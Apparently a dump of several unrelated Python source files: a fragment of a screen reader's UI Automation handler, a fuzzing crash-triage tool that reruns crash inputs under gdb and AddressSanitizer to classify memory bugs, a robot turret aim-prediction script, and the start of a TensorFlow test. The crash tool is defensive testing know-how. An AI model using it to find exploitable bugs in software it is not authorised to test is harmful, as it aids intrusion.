# Therefore, if we can inject in-process, refuse to use UIA and instead fall back to the MS Word object model.
if (
# An MS Word document window
windowClass=="_WwG"
# Disabling is only useful if we can inject in-process (and use our older code)
and appModule.helperLocalBindingHandle
# Allow the user to explisitly force UIA support for MS Word documents no matter the Office version
and not config.conf['UIA']['useInMSWordWhenAvailable']
):
return False
return bool(res)
def isUIAWindow(self,hwnd):
now=time.time()
v=self.UIAWindowHandleCache.get(hwnd,None)
if not v or (now-v[1])>0.5:
v=self._isUIAWindowHelper(hwnd),now
self.UIAWindowHandleCache[hwnd]=v
return v[0]
def getNearestWindowHandle(self,UIAElement):
if hasattr(UIAElement,"_nearestWindowHandle"):
# Called previously. Use cached result.
return UIAElement._nearestWindowHandle
try:
processID=UIAElement.cachedProcessID
except COMError:
return None
appModule=appModuleHandler.getAppModuleFromProcessID(processID)
# WDAG (Windows Defender application Guard) UIA elements should be treated as being from a remote machine, and therefore their window handles are completely invalid on this machine.
# Therefore, jump all the way up to the root of the WDAG process and use that window handle as it is local to this machine.
if appModule.appName==WDAG_PROCESS_NAME:
condition=UIAUtils.createUIAMultiPropertyCondition({UIA_ClassNamePropertyId:[u'ApplicationFrameWindow',u'CabinetWClass']})
walker=self.clientObject.createTreeWalker(condition)
else:
# Not WDAG, just walk up to the nearest valid windowHandle
walker=self.windowTreeWalker
try:
new=walker.NormalizeElementBuildCache(UIAElement,self.windowCacheRequest)
except COMError:
return None
try:
window=new.cachedNativeWindowHandle
except COMError:
window=None
# Cache for future use to improve performance.
UIAElement._nearestWindowHandle=window
return window
def isNativeUIAElement(self,UIAElement):
#Due to issues dealing with UIA elements coming from the same process, we do not class these UIA elements as usable.
#It seems to be safe enough to retreave the cached processID, but using tree walkers or fetching other properties causes a freeze.
try:
processID=UIAElement.cachedProcessId
except COMError:
return False
if processID==windll.kernel32.GetCurrentProcessId():
return False
# Whether this is a native element depends on whether its window natively supports UIA.
windowHandle=self.getNearestWindowHandle(UIAElement)
if windowHandle:
if self.isUIAWindow(windowHandle):
return True
if winUser.getClassName(windowHandle)=="DirectUIHWND" and "IEFRAME.dll" in UIAElement.cachedProviderDescription and UIAElement.currentClassName in ("DownloadBox", "accessiblebutton", "DUIToolbarButton", "PushButton"):
# This is the IE 9 downloads list.
# #3354: UiaHasServerSideProvider returns false for the IE 9 downloads list window,
# so we'd normally use MSAA for this control.
# However, its MSAA implementation is broken (fires invalid events) if UIA is initialised,
# whereas its UIA implementation works correctly.
# Therefore, we must use UIA here.
return True
return False
|
crashminimizer.py
|
#!/usr/bin/env python3
# Author: Casper
# Email: slei.casper@gmail.com
import re
import sys
import time
import argparse
import os
import random
import psutil
import pty
import multiprocessing
DEBUG = True
STACKTRACELEVEL = 3
report_fd = None
def print_red(aMsg):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print("\033[31m%s\033[0m"%aMsg)
def print_green(aMsg):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print("\033[32m%s\033[0m"%aMsg)
def print_yellow(aMsg, aEnd = '\n'):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print("\033[33m%s\033[0m"%(aMsg), end = aEnd, flush=True)
def print_plain(aMsg):
global report_fd
if report_fd:
report_fd.write(aMsg.encode('latin-1') + b'\n')
print(aMsg)
def loginfo(aMsg):
print_green(aMsg)
def logwarn(aMsg):
print_yellow(aMsg)
def logerror(aMsg):
print_red(aMsg)
exit(1)
def genrandomname(aLen = 10):
res = ''
for i in range(aLen):
res += random.choice('qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM')
return res
gdbscripttemplate = '''
import gdb
inf = gdb.inferiors()[0]
gdb.execute("set confirm off")
gdb.execute("set pagination off")
gdb.execute("set logging file /tmp/TEMPFILENAMEcrashanalysis.txt")
gdb.execute("set logging overwrite on")
gdb.execute("set logging on")
gdb.execute("set follow-fork-mode parent")
gdb.execute("set logging redirect on")
gdb.execute("file TARGETBINARYPATH")
gdb.execute("r PROGRAMARGUMENTS 2>/dev/null 1>/dev/null")
gdb.execute("set logging file /tmp/TEMPFILENAMEcrashanalysis.txt")
gdb.execute("set logging on")
gdb.execute("set logging redirect on")
if inf.threads() != ():
print("----------------------------------------------------------------------")
gdb.execute("bt 100")
print("----------------------------------------------------------------------")
gdb.execute("i proc mappings")
print("----------------------------------------------------------------------")
stacktracefd = open("/tmp/TEMPFILENAMEstacktrace.txt", "wb")
tframe = gdb.newest_frame()
tidx = 0
while tframe != None:
taddr = tframe.pc()
tname = str(tframe.name())
stacktracefd.write("{0:d}:::::0x{1:x}:::::{2:s}\\n".format(tidx, taddr, tname).encode('ascii'))
tframe = tframe.older()
tidx += 1
stacktracefd.close()
gdb.execute("q")
'''
split_label = '----------------------------------------------------------------------\n'
bt_pn = re.compile(r'#([0-9a-f]+)\s*(0x[0-9a-f]+)?\s*(in)?\s*([\w_]+)\s*')
segvaddr_pn = re.compile(r'SEGV on unknown address (0x[0-9a-f]+)')
stopreason_pn = re.compile(r'Program received signal (.*),')
blackkeywordlist = [
'sanitizer',
'asan',
'__GI_abort',
'__GI_raise',
'~ScopedInErrorReport',
'ReportGenericError',
'__assert_fail_base',
'__GI___assert_fail'
]
class CrashMinimizer():
def __init__(self, aReportDir):
global report_fd
if aReportDir:
if os.path.exists(aReportDir):
logerror("found crash report directory: %s, delete it if you want to continue"%aReportDir)
os.mkdir(aReportDir)
self.reportdir = aReportDir
report_fd.close()
os.unlink('report.txt')
report_fd = open("%s/report.txt"%self.reportdir, "wb")
else:
self.reportdir = None
self.alluniqstacktraces = {
'normal': [],
'SEGV': [],
'heap-buffer-overflow': [],
'stack-overflow': [],
'stack-underflow': [],
'stack-buffer-overflow': [],
'heap-use-after-free': [],
'global-buffer-overflow': [],
'stack-use-after-return': [],
'stack-use-after-scope': [],
'initialization-order-fiasco': [],
'negative-size-param': [],
'big-malloc-size': [],
'memcpy-param-overlap': [],
'oom': [],
'FPE': [],
'invalidfree': [],
'use-after-poison': [],
'double-free': [],
'unknown-crash': [],
}
self.timeoutlist = []
self.abnormallist = []
self.uniqnum = 0
def cleanuptmpfiles(self, aTempName):
if os.path.exists(f"/tmp/{aTempName}gdbscript.py"):
os.unlink(f"/tmp/{aTempName}gdbscript.py")
if os.path.exists(f"/tmp/{aTempName}stdout.txt"):
os.unlink(f"/tmp/{aTempName}stdout.txt")
if os.path.exists(f"/tmp/{aTempName}stderr.txt"):
os.unlink(f"/tmp/{aTempName}stderr.txt")
if os.path.exists(f"/tmp/{aTempName}gdbstdout.txt"):
os.unlink(f"/tmp/{aTempName}gdbstdout.txt")
if os.path.exists(f"/tmp/{aTempName}gdbstderr.txt"):
os.unlink(f"/tmp/{aTempName}gdbstderr.txt")
if os.path.exists(f"/tmp/{aTempName}crashanalysis.txt"):
os.unlink(f"/tmp/{aTempName}crashanalysis.txt")
if os.path.exists(f"/tmp/{aTempName}stacktrace.txt"):
os.unlink(f"/tmp/{aTempName}stacktrace.txt")
def runpoconce(self, aTargetBinPath, aFuzzArgs, aPocPath, aTestCasePath, aSlaveTTY=None):
'''
this function is multi-process safe, you can run it in multiple processes
return an object describing stack trace
'''
aPocPath = aPocPath.replace('(', '\\(').replace(')', '\\)')
tempname = genrandomname()
newargs = []
isstdin = True
for iarg in aFuzzArgs:
if '@@' in iarg:
isstdin = False
if aTestCasePath == None:
newargs.append(iarg.replace('@@', "%s"%aPocPath))
else:
newargs.append(iarg.replace('@@', "%s"%aTestCasePath))
else:
newargs.append(iarg)
if aTestCasePath:
with open(aPocPath, 'rb') as f:
crashdata = f.read()
with open(aTestCasePath, 'wb') as f:
f.write(crashdata)
tpid = os.fork()
istimeout = False
if tpid == 0:
os.environ['ASAN_OPTIONS'] = 'abort_on_error=1:detect_leaks=0'
tnewstdout = os.open(f'/tmp/{tempname}stdout.txt', os.O_RDWR|os.O_CREAT)
if tnewstdout < 0:
raise Exception("open failed")
tnewstderr = os.open(f'/tmp/{tempname}stderr.txt', os.O_RDWR|os.O_CREAT)
if tnewstderr < 0:
raise Exception("open failed")
if isstdin:
tnewstdin = os.open(aPocPath, os.O_RDONLY)
if tnewstdin < 0:
raise Exception("open failed")
os.dup2(tnewstdin, 0)
os.dup2(tnewstdout, 1)
os.dup2(tnewstderr, 2)
os.execvp(aTargetBinPath, [aTargetBinPath] + newargs)
elif tpid > 0:
tacc = 0
while True:
time.sleep(0.2)
(retpid, retstatus) = os.waitpid(tpid, os.WNOHANG)
if retpid == 0:
time.sleep(1)
tacc += 1
if tacc == 10:
os.system("rkill %d 2>&1 1>/dev/null"%tpid)
(retpid, retstatus) = os.waitpid(tpid, 0)
assert(retpid == tpid)
istimeout = True
else:
break
else:
raise Exception("fork error")
if istimeout == True:
logwarn("timeout when testing poc, sig = %d"%os.WTERMSIG(retstatus));
self.cleanuptmpfiles(tempname)
return {
'result': 'timeout',
'pocpath': aPocPath,
}
progstderrcont = open(f"/tmp/{tempname}stderr.txt", "rb").read().decode('latin-1')
progstdoutcont = open(f"/tmp/{tempname}stdout.txt", "rb").read().decode('latin-1')
gdbscript = gdbscripttemplate.replace("TARGETBINARYPATH", aTargetBinPath)
if isstdin:
newargs.append("<")
newargs.append(aPocPath)
gdbscript = gdbscript.replace("PROGRAMARGUMENTS", ' '.join(newargs))
gdbscript = gdbscript.replace("TEMPFILENAME", tempname)
open(f"/tmp/{tempname}gdbscript.py", "wb").write(gdbscript.encode('latin-1'))
tpid = os.fork()
if tpid == 0:
os.environ['ASAN_OPTIONS'] = 'abort_on_error=1:detect_leaks=0'
tnewstdout = os.open(f'/tmp/{tempname}gdbstdout.txt', os.O_RDWR|os.O_CREAT)
if tnewstdout < 0:
raise Exception("open failed")
tnewstderr = os.open(f'/tmp/{tempname}gdbstderr.txt', os.O_RDWR|os.O_CREAT)
if tnewstderr < 0:
raise Exception("open failed")
os.dup2(tnewstdout, 1)
os.dup2(tnewstderr, 2)
if aSlaveTTY:
args = ["gdb", "--tty=%s"%(os.ttyname(aSlaveTTY)), "-nx", "-x", f"/tmp/{tempname}gdbscript.py"]
else:
args = ["gdb", "-nx", "-x", f"/tmp/{tempname}gdbscript.py"]
os.execvp("gdb", args)
elif tpid > 0:
tacc = 0
while True:
time.sleep(0.5)
(retpid, retstatus) = os.waitpid(tpid, os.WNOHANG)
if retpid == 0:
time.sleep(1)
tacc += 1
if tacc == 10:
os.system("rkill %d 2>&1 1>/dev/null"%tpid)
(retpid, retstatus) = os.waitpid(tpid, 0)
assert(retpid == tpid)
break
else:
break
else:
raise Exception("fork error")
if os.WIFEXITED(retstatus) and os.WEXITSTATUS(retstatus) != 0:
logerror("debug me")
if os.WIFSIGNALED(retstatus):
logwarn("timeout when testing poc, sig = %d"%os.WTERMSIG(retstatus));
self.cleanuptmpfiles(tempname)
return {
'result': 'timeout',
'pocpath': aPocPath,
}
gdbstdout = open(f"/tmp/{tempname}gdbstdout.txt", "rb").read().decode('latin-1')
gdbstderr = open(f"/tmp/{tempname}gdbstderr.txt", "rb").read().decode('latin-1')
gdblog_text = open(f"/tmp/{tempname}crashanalysis.txt", "rb").read().decode('latin-1')
stacktracelog = open(f"/tmp/{tempname}stacktrace.txt", "rb").read().decode('latin-1')
gdblog = gdblog_text.split(split_label)[1:-1]
if len(gdblog) == 0:
self.cleanuptmpfiles(tempname)
return {
'result': 'abnormal',
'pocpath': aPocPath,
}
backtrace = gdblog[0].strip()
vmmap = gdblog[1].strip()
vmmap = vmmap.split('\n')
allmaps = []
startfound = False
for mapline in vmmap:
if startfound:
allmaps.append(mapline.strip())
else:
if 'Start Addr' in mapline:
startfound = True
alllibs = {}
for mapline in allmaps:
if len(mapline.split()) != 5:
continue
startaddr = int(mapline.split()[0], 16)
endaddr = int(mapline.split()[1], 16)
libname = mapline.split()[-1]
if libname not in alllibs:
alllibs[libname] = {'startaddr':startaddr, 'endaddr':endaddr}
else:
if alllibs[libname]['endaddr'] < endaddr:
alllibs[libname]['endaddr'] = endaddr
if alllibs[libname]['startaddr'] > startaddr:
alllibs[libname]['startaddr'] = startaddr
tcurrtrace = {
'result': 'crash',
'funcnames': [],
'idxs': [],
'addrs': [],
'offs': [],
'libs': [],
'filenames': [],
'pocfilename': aPocPath,
'stopreason': '',
'vultype': None,
'progstdoutcont': progstdoutcont,
'progstderrcont': progstderrcont,
'gdbstdout': gdbstdout,
'gdbstderr': gdbstderr,
'gdblog_text': gdblog_text,
'pocpath': aPocPath,
}
top100stackframes = stacktracelog.split('\n')[:100]
for ibtline in top100stackframes:
ibtline = ibtline.strip()
if len(ibtline) == 0:
continue
(tidx, taddr, tname) = ibtline.split(':::::', 3)
tidx = int(tidx)
taddr = int(taddr, 16)
contflag = False
for bword in blackkeywordlist:
if bword in tname:
contflag = True
break
if contflag:
continue
libname = ''
for ilibname in alllibs:
tlib = alllibs[ilibname]
if tlib['startaddr'] <= taddr and taddr < tlib['endaddr']:
libname = ilibname
imageoff = taddr - tlib['startaddr']
break
if libname == '':
logwarn("could not find lib of address 0x%x"%taddr)
else:
libname = ''
tfilename = ''
for tline in backtrace.split('\n'):
tbtpnres = bt_pn.findall(tline)
if len(tbtpnres) == 0:
continue
if int(tbtpnres[0][0]) == tidx:
if ' at ' in tline:
tfilename = tline[tline.find(' at ') + 4:]
break
tcurrtrace['funcnames'].append(tname)
tcurrtrace['offs'].append(imageoff)
tcurrtrace['libs'].append(libname)
tcurrtrace['idxs'].append(tidx)
tcurrtrace['addrs'].append(taddr)
tcurrtrace['filenames'].append(tfilename)
tcurrtrace['type'] = 'none'
if tname in ['main', '__libc_start_main', '_start']:
break
self.cleanuptmpfiles(tempname)
return tcurrtrace
def checkunique(self, aStackTraceObj, aCallbackFunc = None):
global STACKTRACELEVEL
if aStackTraceObj['result'] == 'timeout':
if aStackTraceObj['pocpath'] not in self.timeoutlist:
self.timeoutlist.append(aStackTraceObj['pocpath'])
return
if aStackTraceObj['result'] == 'abnormal':
if aStackTraceObj['pocpath'] not in self.abnormallist:
self.abnormallist.append(aStackTraceObj['pocpath'])
return
find_in_one_of_these = False
if 'AddressSanitizer' in aStackTraceObj['progstderrcont']:
if 'heap-buffer-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['heap-buffer-overflow']
aStackTraceObj['vultype'] = 'heap-buffer-overflow'
elif 'stack-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-overflow']
aStackTraceObj['vultype'] = 'stack-overflow'
elif 'stack-buffer-underflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-underflow']
aStackTraceObj['vultype'] = 'stack-buffer-underflow'
elif 'stack-buffer-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-buffer-overflow']
aStackTraceObj['vultype'] = 'stack-buffer-overflow'
elif 'heap-use-after-free' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['heap-use-after-free']
aStackTraceObj['vultype'] = 'heap-use-after-free'
elif 'global-buffer-overflow' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['global-buffer-overflow']
aStackTraceObj['vultype'] = 'global-buffer-overflow'
elif 'stack-use-after-return' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-use-after-return']
aStackTraceObj['vultype'] = 'stack-use-after-return'
elif 'stack-use-after-scope' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['stack-use-after-scope']
aStackTraceObj['vultype'] = 'stack-use-after-scope'
elif 'initialization-order-fiasco' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['initialization-order-fiasco']
aStackTraceObj['vultype'] = 'initialization-order-fiasco'
elif 'negative-size-param' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['negative-size-param']
aStackTraceObj['vultype'] = 'negative-size-param'
elif ('AddressSanitizer: requested allocation size' in aStackTraceObj['progstderrcont']
or 'AddressSanitizer failed to allocate' in aStackTraceObj['progstderrcont']):
tuniqstacktraces = self.alluniqstacktraces['big-malloc-size']
aStackTraceObj['vultype'] = 'big-malloc-size'
elif 'memcpy-param-overlap' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['memcpy-param-overlap']
aStackTraceObj['vultype'] = 'memcpy-param-overlap'
elif 'allocator is out of memory' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['oom']
aStackTraceObj['vultype'] = 'oom'
elif 'FPE' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['FPE']
aStackTraceObj['vultype'] = 'FPE'
elif 'attempting free on address which was not malloc' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['invalidfree']
aStackTraceObj['vultype'] = 'invalidfree'
elif 'use-after-poison' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['use-after-poison']
aStackTraceObj['vultype'] = 'use-after-poison'
elif 'double-free' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['double-free']
aStackTraceObj['vultype'] = 'double-free'
elif 'unknown-crash' in aStackTraceObj['progstderrcont']:
tuniqstacktraces = self.alluniqstacktraces['unknown-crash']
aStackTraceObj['vultype'] = 'unknown-crash'
elif 'SEGV' in aStackTraceObj['progstderrcont']:
aStackTraceObj['vultype'] = 'SEGV'
tuniqstacktraces = self.alluniqstacktraces['SEGV']
tres = segvaddr_pn.findall(aStackTraceObj['progstderrcont'])
if len(tres) > 0:
tres = tres[0]
if int(tres, 16) == 0:
aStackTraceObj['stopreason'] = 'null pointer dereference'
else:
aStackTraceObj['stopreason'] = 'crashed on address ' + tres
else:
logerror("unknown address sanitizer type, pls update !!! \n" + aStackTraceObj['progstderrcont'])
else:
if len(stopreason_pn.findall(aStackTraceObj['gdbstdout'])) != 0:
aStackTraceObj['stopreason'] = stopreason_pn.findall(aStackTraceObj['gdbstdout'])[0]
aStackTraceObj['vultype'] = 'normal'
tuniqstacktraces = self.alluniqstacktraces['normal']
aStackTraceObj['vulclass'] = tuniqstacktraces
for oldtrace in aStackTraceObj['vulclass']:
allequalflag = True
for idx in range(min(STACKTRACELEVEL, min(len(oldtrace['offs']), len(aStackTraceObj['offs'])))):
if aStackTraceObj['filenames'][idx] == "" and oldtrace['filenames'][idx] == "":
if aStackTraceObj['addrs'][idx] == oldtrace['addrs'][idx]:
continue
elif aStackTraceObj['filenames'][idx] == oldtrace['filenames'][idx]:
continue
allequalflag = False
break
if allequalflag == True:
find_in_one_of_these = True
break
if find_in_one_of_these == False:
loginfo("[+] found uniq backtrace %s"%aStackTraceObj['pocpath'])
aStackTraceObj['vulclass'].append(aStackTraceObj)
if aCallbackFunc:
aCallbackFunc(aStackTraceObj)
self.uniqnum += 1
def printresult(self, aTotalCrashCount):
loginfo("[+] all uniq crashes:")
loginfo("%-30s%-40s%s"%("[vul type]", "[stop reason]", "[crash file name]"))
count = 0
for ivultypename in self.alluniqstacktraces:
iuniqstacktraces = self.alluniqstacktraces[ivultypename]
for iuniqstacktrace in iuniqstacktraces:
tstopreason = iuniqstacktrace['stopreason']
if self.reportdir:
uniqdirname = "%s/%d"%(self.reportdir, count)
os.mkdir(uniqdirname)
with open("%s/gdblog.txt"%uniqdirname, "wb") as ff:
ff.write(iuniqstacktrace['gdblog_text'].encode('latin-1'))
with open("%s/stdout.txt"%uniqdirname, "wb") as ff:
ff.write(iuniqstacktrace['progstdoutcont'].encode('latin-1'))
with open("%s/stderr.txt"%uniqdirname, "wb") as ff:
ff.write(iuniqstacktrace['progstderrcont'].encode('latin-1'))
pocbytes = open(iuniqstacktrace['pocpath'], 'rb').read()
with open("%s/%s"%(uniqdirname, os.path.basename(iuniqstacktrace['pocpath'])), "wb") as ff:
ff.write(pocbytes)
print_red("%-30s%-40s%s"%(
ivultypename,
tstopreason,
iuniqstacktrace['pocfilename']))
for i in range(len(iuniqstacktrace['funcnames'])):
shortnameres = []
tlen = 0
for iword in iuniqstacktrace['filenames'][i].split('/')[::-1]:
tlen += len(iword)
shortnameres.append(iword)
if tlen > 100:
break
shortnameres = '/'.join(shortnameres[::-1])
if len(shortnameres) > 50:
shortnameres = shortnameres[-50:]
print_plain("\t%-5d0x%016x %-30s %s"%(
iuniqstacktrace['idxs'][i],
iuniqstacktrace['addrs'][i],
iuniqstacktrace['funcnames'][i],
shortnameres,
))
count += 1
for iname in self.timeoutlist:
logwarn("[+] timeout: %s"%iname)
for iname in self.abnormallist:
logwarn("[+] abnormal: %s"%iname)
loginfo("[+] total crash count = %d"%(aTotalCrashCount))
loginfo("[+] total uniq crash count = %d"%self.uniqnum)
if self.reportdir:
loginfo("[+] report is saved to %s"%self.reportdir)
else:
loginfo("[+] report is saved to report.txt")
def main():
global report_fd, STACKTRACELEVEL
report_fd = open("report.txt", "wb")
parser = argparse.ArgumentParser()
parser.add_argument("-c", "--crashdir", required = True, help = "crash directory")
parser.add_argument("-w", "--writepath", help = "test case writing path")
parser.add_argument("-s", "--suffix", help = "test case suffix")
parser.add_argument("-d", "--comparisondepth", type = int, default = 3, help = "comparison stack depth")
parser.add_argument('rest', nargs=argparse.REMAINDER, help = "tested program arguments")
parsed_args = parser.parse_args()
crashdir = parsed_args.crashdir
STACKTRACELEVEL = parsed_args.comparisondepth
if crashdir[-1] != '/':
crashdir += '/'
testcasewritepath = parsed_args.writepath
suffix = parsed_args.suffix
targetbinpath = parsed_args.rest[0]
fuzzargs = parsed_args.rest[1:]
if not os.path.exists(targetbinpath):
logerror("couldn't find target binary")
if testcasewritepath and suffix:
logerror("you can only set 'testwritepath' or 'suffix'")
progname = os.path.basename(targetbinpath)
assert(len(progname) != 0)
minimizer = CrashMinimizer("%s_crashreport"%progname)
crashfiles = os.listdir(crashdir)
crashfiles = [x for x in crashfiles if x not in ['README.txt']]
crashfiles.sort()
print_green("starting minimize %d crashes"%len(crashfiles))
if testcasewritepath == None:
pcount = int(multiprocessing.cpu_count() * (1 - psutil.cpu_percent()*0.01) * 2)
if pcount < 3:
pcount = 3
else:
pcount = 1
allcrashresults = multiprocessing.Manager().list()
processidx = multiprocessing.Value('i', 0)
lock = multiprocessing.Lock()
def subproc(aFileNames, aTargetBinPath, aFuzzargs, aLock, aTestCasePath):
(master, slave) = pty.openpty()
for ifilename in aFileNames:
crashpath = crashdir + ifilename
tcurrtrace = minimizer.runpoconce(aTargetBinPath, fuzzargs, crashpath, aTestCasePath, slave)
with aLock:
processidx.value += 1
print_yellow("[+] [%d/%d] checking poc: %s"%(processidx.value, len(crashfiles), ifilename), '\r')
with aLock:
allcrashresults.append(tcurrtrace)
allsubs = []
eachassignmentcount = len(crashfiles) // pcount
if eachassignmentcount == 0:
eachassignmentcount = 1
if suffix:
alltempfiles = []
testcaseprefix = '/tmp/%s'%(genrandomname())
logwarn("using test case prefix %s"%testcaseprefix)
for i in range(0, len(crashfiles) + eachassignmentcount, eachassignmentcount):
arr = crashfiles[i: i + eachassignmentcount]
if len(arr) == 0:
continue
time.sleep(random.random() * 0.05)
if suffix:
testcasewritepath = '%s%d%s'%(testcaseprefix, i, suffix)
alltempfiles.append(testcasewritepath)
p = multiprocessing.Process(target=subproc, args=(arr, targetbinpath, fuzzargs, lock, testcasewritepath))
p.start()
allsubs.append(p)
for p in allsubs:
p.join()
if suffix:
for ipath in alltempfiles:
os.unlink(ipath)
allcrashresults = list(allcrashresults)
for ires in allcrashresults:
minimizer.checkunique(ires)
minimizer.printresult(len(crashfiles))
report_fd.close()
if __name__ == '__main__':
main()
|
predict2.py
|
import time
import math
import threading
from collections import namedtuple
import cv2
import numpy as np
from scipy.stats import linregress
from camera import Camera
from detect_image import RFBNetDetector
from uart import Uart
class Memory():
def __init__(self, max_size=3):
self.max_size = max_size
self.size = 0
self.memory = np.zeros(self.max_size)
self.full = False
def put(self, x):
self.memory[self.size] = x
self.size += 1
if self.size >= self.max_size:
self.size = 0
self.full = True
def getAll(self):
zero_to_now = self.memory[:self.size]
older = self.memory[self.size:]
return np.concatenate([older, zero_to_now], axis=0)
def clean(self):
self.size = 0
self.full = False
class Predictor():
def __init__(self, window=3):
self.slope = None
self.intercept = None
def fit(self, time, angle):
# self.p = np.polyfit(time, angle, w=self.weight, deg=2)
self.slope, self.intercept,_,_,_ = linregress(time, angle)
def predict(self, time):
if self.slope is None:
return None
k = self.slope
b = self.intercept
return k * time + b
def clean(self):
self.slope = None
self.intercept = None
uart = Uart()
predictor = Predictor()
distance = 300
pitch = 0
yaw = 0
def predict_shoot():
global uart, predictor, distance, pitch, yaw
shoot_available = 2
while True:
next_angle = predictor.predict(time.time()+0.4)
if next_angle is None:
time.sleep(0.001)
continue
if uart.predict:
# print("Next angle: {}".format(next_angle))
if abs(next_angle) < 1.5:
if shoot_available > 0:
print("Shoot !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!")
uart.sendTarget(-0.4, pitch, distance)
shoot_available -= 1
else:
shoot_available = 2
time.sleep(0.001)
t = threading.Thread(target=predict_shoot)
#t.setDaemon(True)
t.start()
def run():
global uart, predictor, distance, pitch, yaw
detector = RFBNetDetector()
camera = Camera()
angles = Memory()
timestamp = Memory()
enemy_color = uart.enemy_color
while enemy_color is None:
print("Wait for color...")
enemy_color = uart.enemy_color
time.sleep(0.0333)
src = camera.src
while src is None:
print("Wait for camera...")
src = camera.src
time.sleep(0.01)
armor_box = None
last_armor_box = None
uart_angle = None
while True:
begin = time.time()
uart_angle = (uart.angle)
enemy_color = uart.enemy_color
src = camera.src.copy()
boxes = detector.detect(src)
boxes = np.array(boxes[[1,2][enemy_color=="red"]][0])
#print(boxes)
if boxes.size == 0:
armor_box = None
last_armor_box = None
else:
confidence = boxes[:,-1]
max_arg = np.argmax(confidence)
armor_box = boxes[max_arg,:4]
if boxes.size >= 2 and last_armor_box is not None:
confidence[max_arg] = np.min(confidence)
max_arg = np.argmax(confidence)
sec_armor_box = boxes[max_arg,:4]
if abs(armor_box[0]-last_armor_box[0]) > last_armor_box[2]*0.5 or abs(armor_box[1]-last_armor_box[1]) > last_armor_box[3]*0.5:
if abs(sec_armor_box[0]-last_armor_box[0]) < last_armor_box[2]*0.5 and abs(sec_armor_box[1]-last_armor_box[1]) < last_armor_box[3]*0.5:
armor_box = sec_armor_box
last_armor_box = armor_box
if armor_box is None:
angles.clean()
timestamp.clean()
predictor.clean()
cv2.imshow("src", src)
cv2.waitKey(1)
continue
pitch = ((armor_box[1]+armor_box[3])/2 - 240) * 0.5
distance = (30 * 400) / (armor_box[3] - armor_box[1])
x_error = math.atan(((armor_box[0] + armor_box[2])/2 - (335+390)/2) / 652) / math.pi * 180
yaw = x_error * 0.58
timestamp.put(begin-0.01)
angles.put(x_error)
if angles.full:
last_angles = angles.getAll()
last_timestamps = timestamp.getAll()
predictor.fit(last_timestamps, last_angles)
print("Last angles: {}".format(last_angles))
x = x_error * 0.58 # + omega * 1.8
else:
x = (x_error) * 0.58 #+ 1.6
z = distance
y = pitch
if not uart.predict:
uart.sendTarget(x, y, z)
else:
uart.sendTarget(0, y, z)
end = time.time()
#print("Box: {}, angle: {}, send: {}".format(armor_box, uart_angle, (x, y, z)))
if True:
x1, y1, x2, y2 = armor_box
x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)
src = cv2.rectangle(src, (x1, y1), (x2, y2),
(0,255,0), 2)
if last_armor_box is not None:
x1, y1, x2, y2 = last_armor_box
x1, y1, x2, y2 = int(x1), int(y1), int(x2), int(y2)
src = cv2.rectangle(src, (x1, y1), (x2, y2),
(255,0,255), 2)
cv2.imshow("src", src)
cv2.waitKey(1)
#print("FPS", 1/(end - begin))
if __name__ == '__main__':
run()
|
variable_scope_test.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for variable store."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gc
import threading
import numpy
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.layers import core as core_layers
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables as variables_lib
from tensorflow.python.platform import test
from tensorflow.python.util import compat
from tensorflow.python.util import tf_inspect
def run_inside_wrap_function_in_eager_mode(graph_function):
"""Decorator to execute the same graph code in eager and graph modes.
In graph mode, we just execute the graph_function passed as argument. In eager
mode, we wrap the function using wrap_function and then execute the wrapped
result.
Args:
graph_function: python function containing graph code to be wrapped
Returns:
decorated function
"""
def wrap_and_execute(self):
if context.executing_eagerly():
wrapped = wrap_function.wrap_function(graph_function, [self])
# use the wrapped graph function
wrapped()
else:
# use the original function
graph_function(self)
return wrap_and_execute
class VariableScopeTest(test.TestCase):
def tearDown(self):
gc.collect()
# This will only contain uncollectable garbage, i.e. reference cycles
# involving objects with __del__ defined.
